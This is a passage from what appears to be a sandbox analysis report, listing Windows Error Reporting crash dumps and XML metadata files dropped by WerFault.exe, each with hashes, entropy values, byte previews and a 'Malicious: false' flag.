SHA-512:	5C168AE3F1D00E39A6614FC7B732F504720C66374F30D3DC67B34FCCF7E659AC918C8C5F40AD9B0435F0103CD8997E39342AE4F9E443C0BF3FA6359D32CBFD83
Malicious:	false
Preview:	MDMP..a..... .......A;2g........................................~F..........T.......8...........T............'..*.......................................................................................................eJ......x.......GenuineIntel............T.......h....;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3443.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8364
Entropy (8bit):	3.709296380713716
Encrypted:	false
SSDEEP:	192:R6l7wVeJ2vh6n6Y2DmSU9EgmfZpprR889b+QmsfN1tqm:R6lXJsh6n6YLSU9EgmfZNp+QFfPB
MD5:	719845AC4787410B89B246956658F490
SHA1:	6B59518A2C6576AA0890543DFC2E907DB3038973
SHA-256:	7E5CABD3FB09C84938E64859D8AB33F7DD8AE703984C8D05033FF2F6BDC2C108
SHA-512:	C4F57445241CDD8434458E8D93696EA3823533FE999151C3CFE0E2680D5E1C9B4105461DF72C0EAAA37B23FEC336D357500CB1F77E37365B624A4C21E11E6CA6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.6.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3482.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.526378685407317
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VYGYm8M4JIGFW+q8hl028id:uIjfPI7zD7VuJk6j8id
MD5:	D7B1E8B4AD3FF964CC8185AB88C6C860
SHA1:	6B01EC9374D12AFCF5B907E10BDE056712402C3B
SHA-256:	2D77FB960FDA8BC9975B8DEBD1E202E184DA07E47990E4C625124C208164533B
SHA-512:	2203007517B099FC3A874DD15E5B1AD5225F7687159AA4ACC2435B1C08DD6AD855B1C1070CBB9E8EC89172C27F904469C3B41CDFC15AC2C86E259AA446882507
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3490.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	100388
Entropy (8bit):	1.6673282817795516
Encrypted:	false
SSDEEP:	384:0yo5HSo2OyUq1LOvm2kyyXmgW7cgtIY5kfbpwgVQ13/C:0yo5H2OTq1LOGXXGcgtIfb2xx
MD5:	95227AE79DA255B8449F602DA5D6B411
SHA1:	9BA3CD5A4D8B65790A22687F75F105DCD368CD62
SHA-256:	408AF8D09FDA441F134561FAF2C4087AC2D783F6F2A1106EA5E231C883EF4558
SHA-512:	7EE2EBD8B462552EDDAFCE804FE9F4ABE9A035E512C9A270E3D7FB60B7BFC0C6A3D3655653C5C37D98169C22CB6E7B2B252DDB41032C243B9F58A204E161FC1A
Malicious:	false
Preview:	MDMP..a..... .......A;2g....................................d....C..........T.......8...........T............&..,a......................................................................................................eJ......H.......GenuineIntel............T.......x....;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3666.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8368
Entropy (8bit):	3.7120297589955866
Encrypted:	false
SSDEEP:	192:R6l7wVeJWeS6r6Y2D+SU9rgmfZpprRG89b5psfaJTm:R6lXJK6r6YzSU9rgmfZNP5Cf3
MD5:	4A764E750CC598C4AFA0E85DB225611C
SHA1:	F98436CF9593D40023A9695B92B50FBDB9581F8C
SHA-256:	38647AFCD21CDEA8B994A2D9915102D4C5C7686743156207E8BDF44EF0A3A37C
SHA-512:	5EED3D4A9B74DDD314455854D251BC83D6536297B9B6637B37B851ED7D4F621507BD172A320C0BAD1C35123CAC77D0922A27651A737FE662DE267C8B6D161B0E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER36C4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.532569280786949
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VYmYm8M4JIGFr+q8hI028Td:uIjfPI7zD7VaJ5rj8Td
MD5:	1788BA78EE65B955F854B1D202ACD4D3
SHA1:	CE5449AE6C47DADC72A725782A48B463ECD7297B
SHA-256:	48B626CAD3C979AAE9FBE9BB63A1D547F6B3F1DB662A42294A2775BC824CF99D
SHA-512:	01F6AB918166949936CBA683A80F0B18A9CE3A7E4C399667AA07411FB3B59E6E0C465E6C1B8F05A2C3CBFC63BFDFB5209F8A29A90AFF27231DA966CF4B841169
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4029.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:40 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	97596
Entropy (8bit):	1.794253971605281
Encrypted:	false
SSDEEP:	192:svM2Whd8XgXarBRkZOKddOkAXo4lGNykSR9wL1UaR27eKX3T8tHGv1m4He9IUZbl:v2JrBRkcOdq6bR8eI3Xv4mKvZbltp
MD5:	E56DB0F8195FFF2DAD06EA0F7A5DEF3D
SHA1:	B7CA576CF45E716CFF9C14018D0C964B7B731D65
SHA-256:	73CCD33751FC4289DD16A1AF9B4974ED8DE6C9EDE0E4E4E8E05F1BC64E4B8FD6
SHA-512:	C1E63644AAFA3E3B8774357C02A75C06AF38C771E342CABCA529D449F6FF5379ECCA85458C8EFBE22D89BA449080F85FD9D82E3BD941BD648E65063017149E89
Malicious:	false
Preview:	MDMP..a..... .......D;2g.........................................>..........T.......8...........T...........0!...\..........P...........<...............................................................................eJ..............GenuineIntel............T............;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4104.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.7088017507498448
Encrypted:	false
SSDEEP:	192:R6l7wVeJWn6P6Y2DQSU9BwgmfZpprZ89bmGsf0HCm:R6lXJe6P6YNSU9GgmfZCmlfG
MD5:	29EDE6570BE72124E51092368296668D
SHA1:	A5E89A72202400E61B6836A3429FEFC64D93EEB8
SHA-256:	12E9B7BA2BD89F3E7CCE4748F5A89C72713E783458143E1238DBDA7BAC62D3B6
SHA-512:	28B9A0F89664E180FCBCF202570F3F78D4EE450B35FED47CF3A9275C1CCF3FE1FBCC8AFC5BFD411754106F950DF5AA57916125745CF4A10C709D2B9B00C6DBF3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4134.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.526506840988835
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VY6Ym8M4JIGF++q8hK0285d:uIjfPI7zD7VCJQBj85d
MD5:	77C68B883D673E2753270CA0A9494131
SHA1:	81BE7F1E3EBB9DB88A2336A850D48BA9A0955F31
SHA-256:	75BA1B2D7E3F7A753B500BD57ECEC5576ED550C677F9413BE5824B794DF7D219
SHA-512:	EC65445157FE500497F2B7D05BE00C54FCAE2E1A19F7683D2792EE3FFAF3D83E62FA02E2B9E7450C01EDAE769E110135993AC6CD0278E9F615F2CBE32880CB2E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER475C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:42 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	661420
Entropy (8bit):	1.5496172161314659
Encrypted:	false
SSDEEP:	1536:mGvKhTZCHx0cS+FpB75HcdExYppJJdimQMlF7/:bvKxExlFLBK6Y//T
MD5:	B9165562B70DA640288A6F238D8D14A9
SHA1:	FBFEC3BA899119D4D17F374DA2103EEDE4E127D9
SHA-256:	21E57C218D61208E46C3031843849E2F8FB56D8283B100CC9B7282940BA2B462
SHA-512:	41CE8E8C0261152F487D9F44F4FCE241E10EE521D1FC16E7FF19AFD253BD2FD3A66E499A8437A4D628227723D4806179F483CFCF22A30090C719CB7E7341419B
Malicious:	false
Preview:	MDMP..a..... .......F;2g........................................&...........T.......8...........T...........0...\|...........x,..........d...............................................................................eJ..............GenuineIntel............T.......T....;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER49FD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8376
Entropy (8bit):	3.709017034804886
Encrypted:	false
SSDEEP:	192:R6l7wVeJKt6MMYe6Y2DUSU99gmfZpprw89b99PTsfVfm:R6lXJI6x6YpSU99gmfZ59qfQ
MD5:	4A1E8BD6F8D36092712F2377D3467952
SHA1:	630091F65A9C34FC8C02A0F285B5866D6EA39541
SHA-256:	C21457708431A7D41AD9FC28B648CF83FEA71A0688F8CD54BD30B9FBDC81E4D4
SHA-512:	1C11823D337CEBBE436C3FD11D7A24590D44D22AB4C96AC4389BA1C7B985A26BF37DBC2CB4A19C550CC67B2EDCAD863BAE02C0D5B82E5085B92D0990C0507F74
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A5C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.528313105218298
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VYx5Ym8M4JIGFP+q8hkV028ed:uIjfPI7zD7VioJJpVj8ed
MD5:	1565170A3B844B070ADD7F92F50C9AB9
SHA1:	0352D70F2BC37C7B2033D58FC65F62E305BA1A41
SHA-256:	CDBD0DB0BE3F93AB5A07A6E674C600D6C202683A9B846FE520C6456859AF81AC
SHA-512:	7D9BBCF5D716B5E3342EF7031453EBA311FEBBDB07334A81A8C4286D4EC85FAD88C99068FD0E9F89C4419F218CF45BBA1FD8EE9ED2DDFCC9CEE559D6F0ED73D2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D19.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:43 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	69852
Entropy (8bit):	1.9637174046304262
Encrypted:	false
SSDEEP:	192:3AUUQ64UXVXDQOSOKdlHFRGW6VSTurDf4HwIrnxMRkkEAxA1I9utP:+tQOtO9/z686rTmwIrnxMRILIe
MD5:	9542F188D05B876CAEAC175B385B261E
SHA1:	41C7883EFCBD4E78416C9AD0409B3BA703A26F52
SHA-256:	359CA8048BE747B363036C62FDC38E7ACEF625E0839AECA1ED0E3706E68CAC6A
SHA-512:	BFF5202903448937F582EA2DF04BADC1C00151B14BDE8CCAA55A561AA16687A3158420CCAA1E5D72C0CD1CDBDF046E3AEADA527869027DC60891B1C705FEF40F
Malicious:	false
Preview:	MDMP..a..... .......G;2g............$...............,............5..........T.......8...........T.......................................................................................................................eJ......D.......GenuineIntel............T............;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4EA1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.711415738804674
Encrypted:	false
SSDEEP:	192:R6l7wVeJwq6e6Y2DgSU9dJgmfZpprr89bCisfJB2m:R6lXJ16e6Y9SU9TgmfZ4ChfJZ
MD5:	28FF028C3AF2FFE3B19A0AF727512546
SHA1:	4A212BF39D2DCD32FB1928636EFBD914A9A250A7
SHA-256:	95FDD700465BF37CE19EF2E17790CDF310DECBD3C8587E2C19DEA5350322B66C
SHA-512:	D2F248659AC21CC127DA44FD8F18F0E2513FBE42A8A75B8696F280E9EF19FBB59B0FF15149A1C482C47BD7E60E1F55E43DFEABB5B7729950C21E57E3DC938C4A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5076.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.527600656217282
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VYPYm8M4JIGF/+q8h6J028fd:uIjfPI7zD7VXJRlJj8fd
MD5:	C23A2000CED6B3085B0DABE29FB06F8D
SHA1:	8C2C705732436741D0D3387DFE107B582015BBE6
SHA-256:	670CE2648DC01DBB47EEEF4B54567C1BB4A651A517B84F49FA656B97DAAE3495
SHA-512:	316AE23EE1B858CA700782976AF087254C89834EF3D37E8FA073B8B80FD46F5FF5DE73928D80AC55253BC45642B8247805677FF8096199D0A8CB2D5CE11A1F3E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER52A7.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:45 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	90180
Entropy (8bit):	1.9128108815645986
Encrypted:	false
SSDEEP:	384:6b/2JrBdO9NXNrEXVMpKmSBw5fFzyTUKtBDmJwgYDjNDhrNFvbNq:6b/2JddObFOdNBw9FzuBD
MD5:	BEFB2121F4927151A99654F09EF702BB
SHA1:	F6E19E2F2217A9BF615B6616B1BC881F36F16540
SHA-256:	C259E4361F6D630AF09B5D653A88E4CF5A8EE7ADC28C2B7D4854B5A9E81CA537
SHA-512:	DE23B512095AC171DA79AA66FE7129AFFF62AA80751A73443D11D3003454680226E292D286C6BB6E0C0F3FA4AB8148F6B9EE9BCB9B98C2101FC15E44E76465C0
Malicious:	false
